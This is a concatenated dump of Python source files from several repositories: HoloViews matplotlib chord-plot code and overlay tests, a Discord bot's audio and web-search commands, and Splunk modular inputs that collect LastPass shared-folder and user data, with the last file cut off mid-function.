nodes = element.nodes.select(**{element.nodes.kdims[2].name: nodes})
offset = style.get('label_offset', 1.05)
xs, ys = (nodes.dimension_values(i)*offset for i in range(2))
labels = [lidx.pprint_value(v) for v in nodes.dimension_values(lidx)]
angles = np.rad2deg(np.arctan2(ys, xs))
data['text'] = (xs, ys, labels, angles)
return data, style, plot_kwargs
def init_artists(self, ax, plot_args, plot_kwargs):
artists = {}
if 'arcs' in plot_args:
color_opts = ['c', 'cmap', 'vmin', 'vmax', 'norm']
groups = [g for g in self._style_groups if g != 'arc']
edge_opts = {k[4:] if 'arc_' in k else k: v
for k, v in plot_kwargs.items()
if not any(k.startswith(p) for p in groups)
and k not in color_opts}
paths = plot_args['arcs']
edges = LineCollection(paths, **edge_opts)
ax.add_collection(edges)
artists['arcs'] = edges
artists.update(super(ChordPlot, self).init_artists(ax, plot_args, plot_kwargs))
if 'text' in plot_args:
fontsize = plot_kwargs.get('text_font_size', 8)
labels = []
for (x, y, l, a) in zip(*plot_args['text']):
label = ax.annotate(l, xy=(x, y), xycoords='data', rotation=a,
horizontalalignment='left', fontsize=fontsize,
verticalalignment='center', rotation_mode='anchor')
labels.append(label)
artists['labels'] = labels
return artists
def _update_arcs(self, element, data, style):
edges = self.handles['arcs']
paths = data['arcs']
edges.set_paths(paths)
edges.set_visible(style.get('visible', True))
def _update_labels(self, ax, element, data, style):
labels = self.handles.get('labels', [])
for label in labels:
try:
label.remove()
except:
pass
if 'text' not in data:
self.handles['labels'] = []
return
labels = []
fontsize = style.get('text_font_size', 8)
for (x, y, l, a) in zip(*data['text']):
label = ax.annotate(l, xy=(x, y), xycoords='data', rotation=a,
horizontalalignment='left', fontsize=fontsize,
verticalalignment='center', rotation_mode='anchor')
labels.append(label)
self.handles['labels'] = labels
def update_handles(self, key, axis, element, ranges, style):
data, style, axis_kwargs = self.get_data(element, ranges, style)
self._update_nodes(element, data, style)
self._update_edges(element, data, style)
self._update_arcs(element, data, style)
self._update_labels(axis, element, data, style)
return axis_kwargs
```
#### File: plotting/matplotlib/testoverlayplot.py
```python
import numpy as np
from holoviews.core import Overlay, NdOverlay, DynamicMap, HoloMap
from holoviews.element import Curve, Scatter
from .testplot import TestMPLPlot, mpl_renderer
try:
from holoviews.plotting.mpl import OverlayPlot
except:
pass
class TestOverlayPlot(TestMPLPlot):
def test_interleaved_overlay(self):
"""
Test to avoid regression after fix of https://github.com/ioam/holoviews/issues/41
"""
o = Overlay([Curve(np.array([[0, 1]])) , Scatter([[1,1]]) , Curve(np.array([[0, 1]]))])
OverlayPlot(o)
def test_overlay_empty_layers(self):
overlay = Curve(range(10)) * NdOverlay()
plot = mpl_renderer.get_plot(overlay)
self.assertEqual(len(plot.subplots), 1)
def test_overlay_update_plot_opts(self):
hmap = HoloMap(
{0: (Curve([]) * Curve([])).options(title_format='A'),
1: (Curve([]) * Curve([])).options(title_format='B')}
)
plot = mpl_renderer.get_plot(hmap)
self.assertEqual(plot.handles['title'].get_text(), 'A')
plot.update((1,))
self.assertEqual(plot.handles['title'].get_text(), 'B')
def test_overlay_update_plot_opts_inherited(self):
hmap = HoloMap(
{0: (Curve([]).options(title_format='A') * Curve([])),
1: (Curve([]).options(title_format='B') * Curve([]))}
)
plot = mpl_renderer.get_plot(hmap)
self.assertEqual(plot.handles['title'].get_text(), 'A')
plot.update((1,))
self.assertEqual(plot.handles['title'].get_text(), 'B')
def test_overlay_apply_ranges_disabled(self):
overlay = (Curve(range(10)) * Curve(range(10))).options('Curve', apply_ranges=False)
plot = mpl_renderer.get_plot(overlay)
self.assertTrue(all(np.isnan(e) for e in plot.get_extents(overlay, {})))
def test_overlay_empty_element_extent(self):
overlay = Curve([]).redim.range(x=(-10, 10)) * Scatter([]).redim.range(y=(-20, 20))
plot = mpl_renderer.get_plot(overlay)
extents = plot.get_extents(overlay, {})
self.assertEqual(extents, (-10, -20, 10, 20))
def test_dynamic_subplot_remapping(self):
# Checks that a plot is appropriately updated when reused
def cb(X):
return NdOverlay({i: Curve(np.arange(10)+i) for i in range(X-2, X)})
dmap = DynamicMap(cb, kdims=['X']).redim.range(X=(1, 10))
plot = mpl_renderer.get_plot(dmap)
plot.update((3,))
for i, subplot in enumerate(plot.subplots.values()):
self.assertEqual(subplot.cyclic_index, i+3)
self.assertEqual(list(subplot.overlay_dims.values()), [i+1])
def test_dynamic_subplot_creation(self):
def cb(X):
return NdOverlay({i: Curve(np.arange(10)+i) for i in range(X)})
dmap = DynamicMap(cb, kdims=['X']).redim.range(X=(1, 10))
plot = mpl_renderer.get_plot(dmap)
self.assertEqual(len(plot.subplots), 1)
plot.update((3,))
self.assertEqual(len(plot.subplots), 3)
for i, subplot in enumerate(plot.subplots.values()):
self.assertEqual(subplot.cyclic_index, i)
def test_overlay_xlabel(self):
overlay = (Curve(range(10)) * Curve(range(10))).options(xlabel='custom x-label')
axes = mpl_renderer.get_plot(overlay).handles['axis']
self.assertEqual(axes.get_xlabel(), 'custom x-label')
def test_overlay_ylabel(self):
overlay = (Curve(range(10)) * Curve(range(10))).options(ylabel='custom y-label')
axes = mpl_renderer.get_plot(overlay).handles['axis']
self.assertEqual(axes.get_ylabel(), 'custom y-label')
def test_overlay_xlabel_override_propagated(self):
overlay = (Curve(range(10)).options(xlabel='custom x-label') * Curve(range(10)))
axes = mpl_renderer.get_plot(overlay).handles['axis']
self.assertEqual(axes.get_xlabel(), 'custom x-label')
def test_overlay_ylabel_override(self):
overlay = (Curve(range(10)).options(ylabel='custom y-label') * Curve(range(10)))
axes = mpl_renderer.get_plot(overlay).handles['axis']
self.assertEqual(axes.get_ylabel(), 'custom y-label')
```
|
{
"source": "JewLion/DontBanDog",
"score": 3
}
|
#### File: JewLion/DontBanDog/daudio.py
```python
import asyncio
import discord
import urllib
import re
import requests
import pafy
import os
import sys
import time
import json
import queue
import subprocess
import youtube_dl
from mutagen.mp3 import MP3
from bs4 import BeautifulSoup
from discord.ext import commands
youtube_dl.utils.bug_reports_message = lambda: ''
ytdl_format_options = {
'format': 'bestaudio/best',
'outtmpl': '%(extractor)s-%(id)s-%(title)s.%(ext)s',
'restrictfilenames': True,
'noplaylist': True,
'nocheckcertificate': True,
'ignoreerrors': False,
'logtostderr': False,
'quiet': True,
'no_warnings': True,
'default_search': 'auto',
'source_address': '0.0.0.0'
# bind to ipv4 since ipv6 addresses cause issues sometimes
}
ffmpeg_options = {
'options': '-vn'
}
ytdl = youtube_dl.YoutubeDL(ytdl_format_options)
def youtube(query: str, num: int = 0):
"""Returns the first youtube video"""
url = 'https://youtube.com/results?search_query=' + query.replace(" ", "+")
print(url)
r = requests.get(url).text
num1 = r.find("// scraper_data_begin")
num2 = r.find("// scraper_data_end")
# print (num1)
# print (num2)
yInit = r[num1:num2-1].strip()
num1 = yInit.find('{')
res = yInit[num1:-1]
resource = json.loads(res)
ls = resource['contents']['twoColumnSearchResultsRenderer']
ls = ls['primaryContents']['sectionListRenderer']['contents']
content = ls[0]['itemSectionRenderer']['contents']
for i in range(10):
try:
videoRenderer = content[i]['videoRenderer']
break
except Exception:
print(content[i])
vid = (videoRenderer["videoId"])
page = ("https://youtube.com/watch?v=" + vid)
return page
async def disconnect(vc, ctx, cls):
await vc.disconnect()
cls.remove_voice_state(ctx.guild)
async def play_soundfile(cls, ctx, sf):
vc = ctx.voice_client
path = sf
if vc:
state = vc
else:
state = await ctx.message.author.voice.channel.connect()
player = state.play(discord.FFmpegPCMAudio(sf))
state.source.volume = 0.2
await ctx.message.channel.purge(limit=1)
waitTime = MP3(path).info.length
time.sleep(int(waitTime))
await disconnect(state, ctx, cls)
class YTDLSource(discord.PCMVolumeTransformer):
def __init__(self, source, *, data, volume=0.5):
super().__init__(source, volume)
self.data = data
self.title = data.get('title')
self.url = data.get('url')
self.views = data.get('view_count')
self.uploader = data.get('uploader')
self.duration = data.get('duration')
@classmethod
async def from_url(cls, url, *, loop=None, stream=True):
loop = loop or asyncio.get_event_loop()
data = await loop.run_in_executor(None, lambda: ytdl.extract_info(url, download=not stream))
if 'entries' in data:
data = data['entries'][0]
filename = data['url'] if stream else ytdl.prepare_filename(data)
return cls(discord.FFmpegPCMAudio(filename, **ffmpeg_options),
data=data)
class VoiceEntry:
def __init__(self, message, player, vc, volume):
self.requester = message.author
self.channel = message.channel
self.player = player
self.volume = volume
self.vc = vc
def __str__(self):
fmt = '*{0.title}* uploaded by {0.uploader} and \
requested by {1.display_name} with '
try:
views = self.player.views
num = int(views)
fmt = fmt + (f"{num:,d}") + " views"
except Exception:
fmt += "an unknown amount of views"
fmt += " at {0}% volume".format(self.volume*100)
duration = self.player.duration
if duration:
fmt = fmt + ' [length: {0[0]}m {0[1]}s]'.format(
divmod(duration, 60))
return fmt.format(self.player, self.requester)
class VoiceState:
def __init__(self, bot):
self.current = None
self.voice = None
self.bot = bot
self.play_next_song = asyncio.Event()
self.songs = asyncio.Queue()
self.skip_votes = set() # a set of user_ids that voted
self.audio_player = bot.loop.create_task(self.audio_player_task())
def is_playing(self):
if self.voice is None or self.current is None:
return False
player = self.current.player
return not player.is_done()
@property
def player(self):
return self.current.player
def skip(self):
self.toggle_next()
def toggle_next(self):
self.bot.loop.call_soon_threadsafe(self.play_next_song.set)
async def audio_player_task(self):
await self.bot.wait_until_ready()
while True:
self.play_next_song.clear()
self.current = await self.songs.get()
if False:
try:
self.current = await YTDLSource.regather_stream(
self.current, loop=self.bot.loop)
except Exception as e:
print(e)
continue
self.current.vc.play(
self.current.player, after=lambda _: self.toggle_next())
await self.current.channel.send('Now playing ' + str(self.current))
await self.play_next_song.wait()
# self.current.cleanup()
# self.current = None
```
#### File: JewLion/DontBanDog/search.py
```python
import discord
import urllib
import re
import os
import random
import requests
import html
import json
from bs4 import BeautifulSoup
from discord.ext import commands
class Search(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(pass_context=True)
async def scrabble(self, ctx, word):
url = "https://dictionary.com/browse/" + word
r = requests.get(url).text
if ("no results" in r.lower()):
await ctx.send("word bad bad")
return
values = [1, 3, 3, 2, 1, 4, 2, 4, 1, 8, 5, 1, 3, 1, 1, 3, 10, 1, 1, 1,
1, 4, 4, 8, 4, 10]
points = 0
for letter in word:
num = ord(letter.lower())-97
if (num < 0 or num > 25):
await ctx.send("word bad bad")
return
points += values[num]
await ctx.send(points)
@commands.command(pass_context=True)
async def youtube(self, ctx, *, query):
"""Returns the first youtube video"""
utub = 'https://youtube.com/results?search_query='
url = utub + query.replace(" ", "+")
r = requests.get(url).text
num1 = r.find('{"videoRenderer')
num2 = r.find('{"videoRenderer', num1+1)
# print (num1)
# print (num2)
videoRenderer = (json.loads(r[num1:num2-1])["videoRenderer"])
vid = (videoRenderer["videoId"])
page = ("https://youtube.com/watch?v=" + vid)
await ctx.send(page)
@commands.command(pass_context=True)
async def bImage(self, ctx, query, num=1):
"""Returns the first image from the bing search"""
webpage = "http://www.bing.com/images/search?q=" + query.replace(" ", "+") + "&view=detailv2&adlt=off&selectedIndex=0"
html_content = urllib.request.urlopen(webpage)
str_html = html_content.read().decode("utf-8")
match = re.findall(r'src="http://?([^\'" >]+)', str_html)
if match:
try:
await ctx.send("http://" + match[num-1])
except (Exception):
await ctx.send("```No " + str(num) + "th Result```")
else:
await ctx.send("```No Image Found```")
@commands.command(pass_context=True)
async def gImage(self, ctx, query, num=1):
"""Returns the first image from the google search"""
imageKey = ""
f = open("secrets.txt", "r")
imageKey = f.readlines()[1].strip()
f.close()
webpage = "https://www.googleapis.com/customsearch/v1?cx=013629950505680552901%3Axac8ijijt08&searchType=image&key=" + imageKey + "&q=" + query.replace(" ", "+")
r = requests.get(webpage).text
js = json.loads(r)
try:
pic = (js['items'][1-num]['link'])
listd = pic.split('.')
end = (listd[len(listd)-1])
if (end[:3] == 'jpg'):
end = 'jpg'
elif (end[:3] == 'png'):
end = 'png'
elif (end[:4] == 'jpeg'):
end = 'jpg'
else:
raise Exception("not jpg or png")
urllib.request.urlretrieve(pic, "img/gimage." + end)
await ctx.send(file=discord.File('img/gimage.' + end))
os.remove('img/gimage.'+end)
return
except IndexError:
await ctx.send("```No " + str(num) + "th Result```")
except Exception:
try:
await ctx.send(pic)
except Exception:
await ctx.send("```No Image Found```")
@commands.command(pass_context=True)
async def ub(self, ctx, query=random):
"""Returns the first Urban Dictionary result"""
if query == random:
webpage = "https://www.urbandictionary.com/random.php"
else:
webpage = "http://www.urbandictionary.com/define.php?term=" + query.replace(" ", "+")
r = requests.get(webpage).text
soup = BeautifulSoup(r, 'lxml')
title = soup.find_all("div", {"class": "def-header"})[0]
await ctx.send(title.find_all("a")[0].text)
meaning = soup.find_all("div", {"class": "meaning"})[0].text
await ctx.send("Meaning: " + html.unescape(meaning))
example = soup.find_all("div", {"class": "example"})[0].text
await ctx.send("Example: " + html.unescape(example))
@commands.command(pass_context=True)
async def xkcd(self, ctx, num:int = -1):
"""Returns a random xkcd comic"""
if (num < 0):
webpage = "https://c.xkcd.com/random/comic/"
else:
try:
webpage = "https://xkcd.com/" + str(num)
r = requests.get(webpage).text
soup = BeautifulSoup(r, 'lxml')
title = soup.find_all("div", {"id": "ctitle"})[0]
comic = soup.find_all("div", {"id": "comic"})[0]
img = comic.find_all("img")[0]
await ctx.send(title.text)
await ctx.send("https:" + img.get('src'))
return
except IndexError:
webpage = "https://xkcd.com/"
r = requests.get(webpage).text
soup = BeautifulSoup(r)
title = soup.find_all("div", {"id": "ctitle"})[0]
comic = soup.find_all("div", {"id": "comic"})[0]
img = comic.find_all("img")[0]
await ctx.send(title.text)
await ctx.send("https:" + img.get('src'))
@commands.command(pass_context=True)
async def chobbes(self, ctx):
calvin = 'https://www.gocomics.com/random/calvinandhobbes'
r = requests.get(calvin).text
soup = BeautifulSoup(r, 'lxml')
pic = soup.find_all('img', {'class':'img-fluid'})[1].get('src')
urllib.request.urlretrieve(pic, 'img/calvin.jpg')
await ctx.send(file=discord.File('img/calvin.jpg'))
os.remove("img/calvin.jpg")
@commands.command(pass_context=True)
async def define (self, ctx, query:str, num:int = 1):
"""Returns a definition"""
url = "https://dictionary.com/browse/" + query
r = requests.get(url).text
soup = BeautifulSoup(r, 'lxml')
defin = soup.find_all("div", {"class": "def-content"})[num - 1]
await ctx.send(defin.text)
def setup(bot):
bot.add_cog(Search(bot))
```
|
{
"source": "jewnix/TA-lastpass",
"score": 2
}
|
#### File: TA-lastpass/bin/input_module_lastpass_shared_folders.py
```python
import re
import os
import sys
import time
import json
import copy
import requests
import datetime
import traceback
LP_CHECKPOINT_KEY = 'LastPass_folders'
CMD_KEY = 'getsfdata'
CMD_KEY = 'getdetailedsfdata'
PAGE_SIZE = 2000
USER_EV_LIMIT = 50
CHECKPOINT_SAVE_LIMIT = 100
'''
IMPORTANT
Edit only the validate_input and collect_events functions.
Do not edit any other part in this file.
This file is generated only once when creating the modular input.
'''
'''
# For advanced users, if you want to create single instance mod input, uncomment this method.
def use_single_instance_mode():
return True
'''
def validate_input(helper, definition):
"""Implement your own validation logic to validate the input stanza configurations"""
# This example accesses the modular input variable
# lastpass_api_url = definition.parameters.get('lastpass_api_url', None)
# time_start = definition.parameters.get('time_start', None)
url = definition.parameters.get('lastpass_api_url', None)
if 'https://' in url:
return
# replace if http but not https
elif 'http' in url and 'https://' not in url:
raise ValueError('"HTTP" protocol not allowed. Please update for HTTPS.')
elif '.' not in url:
raise ValueError('URL submission invalid. Please validate domain.')
elif 'https://' not in url:
# add proper url
definition.parameters['lastpass_api_url'] = 'https://'+url
def save_checkpoint(helper, idx_folder, iter_user = 0):
'''
update checkpoint with index to track folder list
@param idx_folder: index for folders
@type idx_folder: int
@param iter_user: index for user count within folder
@type iter_user: int
'''
try:
if isinstance(idx_folder, int) and isinstance(iter_user, int):
state_payload = {}
state_payload['idx_folder'] = idx_folder
state_payload['iter_user'] = iter_user
helper.save_check_point(LP_CHECKPOINT_KEY, state_payload)
else:
raise Exception(f'Invalid index key types for checkpointing LastPass shared folder input: folder_index={idx_folder} user_iter_index={iter_user}')
except Exception as e:
raise IOError(f'Save LastPass folder checkpoint failed. folder_index={idx_folder} user_iter_index={iter_user} reason="{e}"')
def get_checkpoint(helper):
'''
extract checkpoint index value
:return: index value or None
'''
# if checkpoint corrupted or not readable, consider empty
try:
state_payload = helper.get_check_point(LP_CHECKPOINT_KEY)
except Exception as e:
helper.log_warning(f'Loading checkpoint. Unable to load checkpoint. reason="{e.message}"')
return None
if isinstance(state_payload, dict):
return state_payload
helper.log_warning(f'Loading checkpoint. Invalid index key types for LastPass shared folder input. checkpoint_payload="{repr(state_payload)}"')
return None
def collect_events(helper, ew):
"""Implement your data collection logic here
# The following examples get the arguments of this input.
# Note, for single instance mod input, args will be returned as a dict.
# For multi instance mod input, args will be returned as a single value.
opt_text = helper.get_arg('text')
opt_text_1 = helper.get_arg('text_1')
# In single instance mode, to get arguments of a particular input, use
opt_text = helper.get_arg('text', stanza_name)
opt_text_1 = helper.get_arg('text_1', stanza_name)
# get input type
helper.get_input_type()
# The following examples get input stanzas.
# get all detailed input stanzas
helper.get_input_stanza()
# get specific input stanza with stanza name
helper.get_input_stanza(stanza_name)
# get all stanza names
helper.get_input_stanza_names()
# The following examples get options from setup page configuration.
# get the loglevel from the setup page
loglevel = helper.get_log_level()
# get proxy setting configuration
proxy_settings = helper.get_proxy()
# get account credentials as dictionary
account = helper.get_user_credential_by_username("username")
account = helper.get_user_credential_by_id("account id")
# get global variable configuration
global_cid = helper.get_global_setting("cid")
global_provhash = helper.get_global_setting("provhash")
# The following examples show usage of logging related helper functions.
# write to the log for this modular input using configured global log level or INFO as default
helper.log("log message")
# write to the log using specified log level
helper.log_debug("log message")
helper.log_info("log message")
helper.log_warning("log message")
helper.log_error("log message")
helper.log_critical("log message")
# set the log level for this modular input
# (log_level can be "debug", "info", "warning", "error" or "critical", case insensitive)
helper.set_log_level(log_level)
# The following examples send rest requests to some endpoint.
response = helper.send_http_request(url, method, parameters=None, payload=None,
headers=None, cookies=None, verify=True, cert=None,
timeout=None, use_proxy=True)
# get the response headers
r_headers = response.headers
# get the response body as text
r_text = response.text
# get response body as json. If the body text is not a json string, raise a ValueError
r_json = response.json()
# get response cookies
r_cookies = response.cookies
# get redirect history
historical_responses = response.history
# get response status code
r_status = response.status_code
# check the response status, if the status is not sucessful, raise requests.HTTPError
response.raise_for_status()
# The following examples show usage of check pointing related helper functions.
# save checkpoint
helper.save_check_point(key, state)
# delete checkpoint
helper.delete_check_point(key)
# get checkpoint
state = helper.get_check_point(key)
# To create a splunk event
helper.new_event(data, time=None, host=None, index=None, source=None, sourcetype=None, done=True, unbroken=True)
"""
'''
# The following example writes a random number as an event. (Multi Instance Mode)
# Use this code template by default.
import random
data = str(random.randint(0,100))
event = helper.new_event(source=helper.get_input_type(), index=helper.get_output_index(), sourcetype=helper.get_sourcetype(), data=data)
ew.write_event(event)
'''
'''
# The following example writes a random number as an event for each input config. (Single Instance Mode)
# For advanced users, if you want to create single instance mod input, please use this code template.
# Also, you need to uncomment use_single_instance_mode() above.
import random
input_type = helper.get_input_type()
for stanza_name in helper.get_input_stanza_names():
data = str(random.randint(0,100))
event = helper.new_event(source=input_type, index=helper.get_output_index(stanza_name), sourcetype=helper.get_sourcetype(stanza_name), data=data)
ew.write_event(event)
'''
rest_url = helper.get_arg('lastpass_api_url')
if not rest_url:
rest_url = 'https://lastpass.com/enterpriseapi.php'
# pre-fix domain to proper URL
elif 'https://' not in rest_url:
rest_url = f'https://{rest_url}'
helper.log_debug(f'LastPass parameter check: rest_url={rest_url}')
headers = { 'Content-Type': 'application/json' }
# build data params
data = {}
data['cid'] = helper.get_global_setting('cid')
data['provhash'] = helper.get_global_setting('provhash')
data['cmd'] = CMD_KEY
data['apiuser'] = 'splunk.collector'
''' algorithm w checkpointing:
if results are larger than max page size, checkpoint page index
'''
time_val = datetime.datetime.now().timestamp()
try:
helper.log_debug(f'LastPass shared folder collection. Collecting shared folder details.')
resp_ev = requests.post(rest_url, headers=headers, data=json.dumps(data))
if resp_ev.status_code != 200:
helper.log_critical(f'LastPass shared folder collection. request data failed.')
elif re.search(r"(Authorization Error)", resp_ev.text):
helper.log_exception(f'LastPass shared folder collection. request data failed. 401: Unauthorized. Verify cid/provhash.')
resp_ev_json = resp_ev.json()
# track for malformed REST call
if resp_ev_json.get('status') and 'OK' not in resp_ev_json.get('status'):
helper.log_critical(f'LastPass shared folder collection. REST call successful, but query is bad. Validate request params. Terminating script')
return
#sys.exit(1)
except Exception as e:
raise e
# track all folders
folders = {}
user_count = 1
temp_folder = None
helper.log_debug(f'LastPass shared folder collection. total_folders={len(resp_ev_json)}')
try:
for idx_folder, folder_id in enumerate(resp_ev_json):
findex = 0
temp_folder = resp_ev_json[folder_id]
user_count = len(resp_ev_json[folder_id]['users'])
helper.log_debug(f'LastPass shared folder collection. folder_id={folder_id} folder_user_count={user_count}')
# split folder details by user limit
if user_count > USER_EV_LIMIT:
for ff in range(0, user_count, USER_EV_LIMIT):
helper.log_debug(f'LastPass shared folder collection. iterating over user count. folder_id={folder_id} folder_user_count={user_count} curr_folder_user_count={ff}')
folder_idx = f'{folder_id}-{findex}'
folders[folder_idx] = {}
folders[folder_idx]['folder_id'] = folder_idx
folders[folder_idx]['folder_index'] = findex
folders[folder_idx]['time_collected'] = time_val
folders[folder_idx]['event'] = 'list_folders'
# copy all folder details into event entry,
# for user, copy slice of user list
for field in temp_folder.keys():
if field == 'users':
folders[folder_idx][field] = temp_folder[field][ff:(ff+USER_EV_LIMIT)]
else:
folders[folder_idx][field] = temp_folder[field]
folders[folder_idx]['user_count'] = len(folders[folder_idx][field])
event = helper.new_event(data=json.dumps(folders[folder_idx]),
time=time_val,
source=helper.get_input_type(),
index=helper.get_output_index(),
sourcetype=helper.get_sourcetype())
ew.write_event(event)
findex += 1
if findex % 3 == 0:
save_checkpoint(helper, idx_folder, ff)
helper.log_debug(f'LastPass shared folder collection. Updating LastPass identity checkpoint: {idx_folder} folder_user_iter={ff}')
# TODO need to validate limits on collecting shared folders
else:
folders[folder_id] = {}
folders[folder_id].update(temp_folder)
folders[folder_id]['folder_id'] = folder_id
folders[folder_id]['time_collected'] = time_val
folders[folder_id]['event'] = 'list_folders'
folders[folder_id]['user_count'] = len(folders[folder_id]['users'])
event = helper.new_event(data=json.dumps(folders[folder_id]),
time=time_val,
source=helper.get_input_type(),
index=helper.get_output_index(),
sourcetype=helper.get_sourcetype())
ew.write_event(event)
# checkpoint folder details for tracking
if idx_folder % CHECKPOINT_SAVE_LIMIT == 0:
save_checkpoint(helper, idx_folder)
helper.log_debug(f'LastPass shared folder collection. Updating LastPass identity checkpoint: {idx_folder}')
except Exception as e:
helper.log_critical(f'Lastpass identity collection. Error in forwarding data: {traceback.format_exc()}')
raise e
```
#### File: TA-lastpass/bin/input_module_lastpass_users.py
```python
import re
import os
import sys
import time
import json
import copy
import requests
import datetime
import traceback
import hashlib
LP_CHECKPOINT_KEY = 'LastPass_user'
CMD_KEY = 'getuserdata'
PAGE_SIZE = 2000
PAGE_INDEX = 0
'''
IMPORTANT
Edit only the validate_input and collect_events functions.
Do not edit any other part in this file.
This file is generated only once when creating the modular input.
'''
'''
# For advanced users, if you want to create single instance mod input, uncomment this method.
def use_single_instance_mode():
return True
'''
def validate_input(helper, definition):
"""Implement your own validation logic to validate the input stanza configurations"""
# This example accesses the modular input variable
# lastpass_api_url = definition.parameters.get('lastpass_api_url', None)
# time_start = definition.parameters.get('time_start', None)
url = definition.parameters.get('lastpass_api_url', None)
if 'https://' in url:
return
# replace if http but not https
elif 'http' in url and 'https://' not in url:
raise ValueError('"HTTP" protocol not allowed. Please update for HTTPS.')
elif '.' not in url:
raise ValueError('URL submission invalid. Please validate domain.')
elif 'https://' not in url:
# add proper url
definition.parameters['lastpass_api_url'] = 'https://'+url
def save_checkpoint(helper, index_users, index_groups):
'''
update checkpoint with index values for both user and group lists
@param index_users: page index for users
@param index_groups: page index for groups
@type index_users: int
@type index_users: int
'''
try:
if isinstance(index_users, int) and isinstance(index_groups, int):
state_payload = {}
state_payload['idx_user'] = index_users
state_payload['idx_group'] = index_groups
helper.save_check_point(LP_CHECKPOINT_KEY, state_payload)
else:
raise Exception(f'Invalid index key types for checkpointing LastPass user input: user_index={index_users} group_index={index_groups}')
except Exception as e:
raise IOError(f'Save LastPass user checkpoint failed. user_index={index_users} group_index={index_groups} reason="{e}"')
def get_checkpoint(helper):
'''
extract checkpoint index value
:return: index value or None
'''
# if checkpoint corrupted or not readable, consider empty
try:
state_payload = helper.get_check_point(LP_CHECKPOINT_KEY)
except Exception as e:
helper.log_warning(f'Loading checkpoint. Unable to load checkpoint. reason="{e.message}"')
return None
if isinstance(state_payload, dict):
return state_payload
helper.log_warning(f'Loading checkpoint. Invalid index key types for LastPass user input. checkpoint_payload="{repr(state_payload)}"')
return None
def collect_events(helper, ew):
"""Implement your data collection logic here
# The following examples get the arguments of this input.
# Note, for single instance mod input, args will be returned as a dict.
# For multi instance mod input, args will be returned as a single value.
opt_text = helper.get_arg('text')
opt_text_1 = helper.get_arg('text_1')
# In single instance mode, to get arguments of a particular input, use
opt_text = helper.get_arg('text', stanza_name)
opt_text_1 = helper.get_arg('text_1', stanza_name)
# get input type
helper.get_input_type()
# The following examples get input stanzas.
# get all detailed input stanzas
helper.get_input_stanza()
# get specific input stanza with stanza name
helper.get_input_stanza(stanza_name)
# get all stanza names
helper.get_input_stanza_names()
# The following examples get options from setup page configuration.
# get the loglevel from the setup page
loglevel = helper.get_log_level()
# get proxy setting configuration
proxy_settings = helper.get_proxy()
# get account credentials as dictionary
account = helper.get_user_credential_by_username("username")
account = helper.get_user_credential_by_id("account id")
# get global variable configuration
global_cid = helper.get_global_setting("cid")
global_provhash = helper.get_global_setting("provhash")
# The following examples show usage of logging related helper functions.
# write to the log for this modular input using configured global log level or INFO as default
helper.log("log message")
# write to the log using specified log level
helper.log_debug("log message")
helper.log_info("log message")
helper.log_warning("log message")
helper.log_error("log message")
helper.log_critical("log message")
# set the log level for this modular input
# (log_level can be "debug", "info", "warning", "error" or "critical", case insensitive)
helper.set_log_level(log_level)
# The following examples send rest requests to some endpoint.
response = helper.send_http_request(url, method, parameters=None, payload=None,
headers=None, cookies=None, verify=True, cert=None,
timeout=None, use_proxy=True)
# get the response headers
r_headers = response.headers
# get the response body as text
r_text = response.text
# get response body as json. If the body text is not a json string, raise a ValueError
r_json = response.json()
# get response cookies
r_cookies = response.cookies
# get redirect history
historical_responses = response.history
# get response status code
r_status = response.status_code
# check the response status, if the status is not sucessful, raise requests.HTTPError
response.raise_for_status()
# The following examples show usage of check pointing related helper functions.
# save checkpoint
helper.save_check_point(key, state)
# delete checkpoint
helper.delete_check_point(key)
# get checkpoint
state = helper.get_check_point(key)
# To create a splunk event
helper.new_event(data, time=None, host=None, index=None, source=None, sourcetype=None, done=True, unbroken=True)
"""
'''
# The following example writes a random number as an event. (Multi Instance Mode)
# Use this code template by default.
import random
data = str(random.randint(0,100))
event = helper.new_event(source=helper.get_input_type(), index=helper.get_output_index(), sourcetype=helper.get_sourcetype(), data=data)
ew.write_event(event)
'''
'''
# The following example writes a random number as an event for each input config. (Single Instance Mode)
# For advanced users, if you want to create single instance mod input, please use this code template.
# Also, you need to uncomment use_single_instance_mode() above.
import random
input_type = helper.get_input_type()
for stanza_name in helper.get_input_stanza_names():
data = str(random.randint(0,100))
event = helper.new_event(source=input_type, index=helper.get_output_index(stanza_name), sourcetype=helper.get_sourcetype(stanza_name), data=data)
ew.write_event(event)
'''
global PAGE_INDEX
rest_url = helper.get_arg('lastpass_api_url')
if not rest_url:
rest_url = 'https://lastpass.com/enterpriseapi.php'
# pre-fix domain to proper URL
elif 'https://' not in rest_url:
rest_url = f'https://{rest_url}'
helper.log_debug(f'LastPass parameter check: rest_url={rest_url}')
headers = { 'Content-Type': 'application/json' }
# build data params
data = {}
data['cid'] = helper.get_global_setting('cid')
data['provhash'] = helper.get_global_setting('provhash')
data['cmd'] = CMD_KEY
data['apiuser'] = 'splunk.collector'
''' algorithm w checkpointing:
if results are larger than max page size, checkpoint page index
'''
chk_user = 0
while True:
data['data'] = { 'pagesize': PAGE_SIZE, 'pageindex': PAGE_INDEX }
try:
helper.log_debug(f'LastPass identity collection. Collecting user identities. page_index={PAGE_INDEX}')
resp_ev = requests.post(rest_url, headers=headers, data=json.dumps(data))
if resp_ev.status_code != 200:
helper.log_critical(f'LastPass identity collection. request data failed.')
elif re.search(r"(Authorization Error)", resp_ev.text):
helper.log_exception(f'LastPass identity collection. request data failed. 401: Unauthorized. Verify cid/provhash.')
resp_ev_json = resp_ev.json()
# track for malformed REST call
if resp_ev_json.get('status') and 'OK' not in resp_ev_json.get('status'):
helper.log_critical(f'Lastpass identity collection. REST call successful, but query is bad. Validate request params. Terminating script')
#helper.log_debug(f'Lastpass identity collection. Failed request: {data}')
return
#sys.exit(1)
except Exception as e:
raise e
total = resp_ev_json.get('total')
count = resp_ev_json.get('count')
helper.log_debug(f'LastPass identity collection. total_identities={total} current_count={count}')
# track all identities
users = {}
groups = {}
chk_group = 0
chk_invited = False
time_val = datetime.datetime.now().timestamp()
try:
for idx_user, user in enumerate(resp_ev_json.get('Users')):
users[user] = copy.deepcopy(resp_ev_json.get('Users')[user])
users[user]['user_id'] = user
users[user]['time_collected'] = time_val
users[user]['event'] = 'list_users'
chk_user += 1
if chk_user % 250 == 0:
time_val = datetime.datetime.now().timestamp()
# attrib field cleanup
if users[user].get('attribs'):
# detect and render if name is JSON
if users[user].get('attribs').get('name'):
try:
test = json.loads(users[user].get('attribs').get('name'))
users[user].get('attribs').update({'name': test})
# do not change if not a JSON value
except:
pass
# scrub password values from attribs
if users[user].get('attribs').get('password'):
